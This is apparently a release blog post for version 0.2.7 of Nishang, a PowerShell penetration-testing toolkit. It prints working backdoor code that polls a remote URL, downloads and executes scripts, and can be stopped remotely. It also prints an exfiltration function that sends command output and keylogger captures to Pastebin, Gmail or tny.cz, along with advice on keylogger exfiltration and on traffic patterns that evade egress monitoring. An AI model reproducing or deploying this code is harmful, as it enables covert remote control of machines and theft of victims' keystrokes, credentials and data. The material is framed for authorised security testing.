Nishang 0.2.7 - Improved backdoors, keylogger and better exfiltration

I like the backdoors in Nishang. Though very basic, they could be very useful depending on the situation and permission of usage (during a pen test). Two major things that have been improved in Nishang 0.2.7 for the backdoors (DNS_TXT_Pwnage, Time_Execution and Wait_For_Command) are:

1. These can now be stopped remotely and do not stop automatically after a single run.

This stopping remotely has been achieved by a simple logic. A payload asks for a URL (or DNS TXT record in case of DNS TXT Pwnage) where it will look for a particular string. As soon as the string is found there, the backdoor will stop itself. Below code snippet of Wait For Command shows this

function Wait_For_Command<br>{<br><br>    while($true)<br>    {<br>    $exec = 0<br>    start-sleep -seconds 5<br>    $webclient = New-Object System.Net.WebClient<br>    $filecontent = $webclient.DownloadString("$CheckURL")<br>    if($filecontent -eq $MagicString)<br>    {<br>        $webclient = New-Object System.Net.WebClient<br>        $file1 = "$env:temp\payload.ps1"<br>        $webclient.DownloadFile($PayloadURL,"$file1")<br>        $pastevalue = Invoke-Expression $file1<br>        $exec++<br>        if ($exfil -eq $True)<br>        {<br>            Do-exfiltration<br>        }<br>        if ($exec -eq 1)<br>        {<br>            Start-Sleep -Seconds 60<br>        }<br>    }<br>    elseif ($filecontent -eq $StopString)<br>    {<br>        break<br>    }<br>    }<br>}<br>

What do we see here? The backdoor connects to $CheckURL every 5 seconds to look for a payload. If it matches $MagicString (lol!), a script is downloaded and executed. We will have a look at exfiltration in a moment. Ok, then the variable $exec is checked for. on sucess the payload waits for a minute before doing anything else. This is implemented to avoid generating too much traffic.

Still, since the backdoor connects every 5 seconds to a URL, it could be picked up fairly easily if someone monitors the egress traffic. Things are under constant improvement and in a future release the backdoors may connect in an irregular interval.

2. Exfiltration methods have been added and improved. Now the payloads can send data to pastebin, gmail or tinypaste. The backdoors can now return the result of command or script execution using one of the exfiltration methods. A new function Do-Exfiltration has been added to payloads which need to communicated to the Internet.

function Do-exfiltration<br>{<br>    $paste_name = $env:COMPUTERNAME + ": Results of Wait for Command"<br>    function post_http($url,$parameters) <br>    { <br>        $http_request = New-Object -ComObject Msxml2.XMLHTTP <br>        $http_request.open("POST", $url, $false) <br>        $http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded") <br>        $http_request.setRequestHeader("Content-length", $parameters.length); <br>        $http_request.setRequestHeader("Connection", "close") <br>        $http_request.send($parameters) <br>        $script:session_key=$http_request.responseText <br>    } <br><br>    function Get-MD5()<br>    {<br>        #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell<br>        $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider<br>        $utf8 = new-object -TypeName System.Text.UTF8Encoding<br>        $hash = [System.BitConverter]::ToString($md5.ComputeHash($utf8.GetBytes($password))).Replace("-", "").ToLower()<br>        return $hash<br>    }<br><br>    if ($keyoutoption -eq "0")<br>    {<br>        $pastevalue<br>    }<br><br>    elseif ($keyoutoption -eq "1")<br>    {<br>        post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password" <br>        post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$paste_name&api_paste_code=$pastevalue&api_paste_private=2" <br>    }<br><br>    elseif ($keyoutoption -eq "2")<br>    {<br>        #http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage<br>        $smtpserver = “smtp.gmail.com”<br>        $msg = new-object Net.Mail.MailMessage<br>        $smtp = new-object Net.Mail.SmtpClient($smtpServer )<br>        $smtp.EnableSsl = $True<br>        $smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”); <br>        $msg.From = “$username@gmail.com”<br>        $msg.To.Add(”$username@gmail.com”)<br>        $msg.Subject = $paste_name<br>        $msg.Body = $pastevalue<br>        if ($filename)<br>        {<br>            $att = new-object Net.Mail.Attachment($filename)<br>            $msg.Attachments.Add($att)<br>        }<br>        $smtp.Send($msg)<br>    }<br><br>    elseif ($keyoutoption -eq "3")<br>    {<br><br>        $hash = Get-MD5<br>        post_http "http://tny.cz/api/create.xml" "paste=$pastevalue&title=$paste_name&is_code=0&is_private=1&password=$dev_key&authenticate=$username`:$hash"<br>    }<br><br>}<br><br>

Lets see Wait For Command in action with exfiltration enabled.


While running this from a non-interactive* shell, use it like this:



 *non-interactive in terms of powershell. For example, due to standard output handling an interactive powershell is not possible from a meterprete or native shell from msf.

We used Get-WLAN-Keys from a Non-Elevated Shell, so the result is:


Nice! Make sure to return result from the payload which would be downloaded.

The biggest impact of this would be on the keylogger as it sends much data and pastebin allowed only limited pastes every day for a free account. Gmail is recommended for keylogger. If the Gmail account used for exfiltration has two factor authentication one can always use a application specific passoword. There has been another small but significant improvement in the keylogger. Now the keylogger will send only new keys after sending all keys 30 times. This reduces the size of data sent and removes redundant keys.

Persistence has been tested for most of the payloads and will be a part of a near future release.

 Below is the full CHANGELOG for this version:

0.2.7
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now be stopped remotely. Also, these does not stop autmoatically after running a script/command now.
- DNS_TXT_Pwnage, Time_Execution and Wait_For_Command can now return results using selected exfiltration method.
- Fixed a minor bug in DNS_TXT_Pwnage.
- All payloads which could post data to the internet now have three options pastebin/gmail/tinypaste for exfiltration.
- Added Get-PassHashes payload.
- Added Download-Execute-PS payload.
- The keylogger logs only fresh keys after exfiltring the keys 30 times.
- A delay after success has been introduced in various payloads which connect to the internet to avoid generating too much traffic.

You can get Nishang from its repository here. New users please check out and older users please update your repos.

I expect feedback, comments, bugs and feature requests. Hope this would be useful.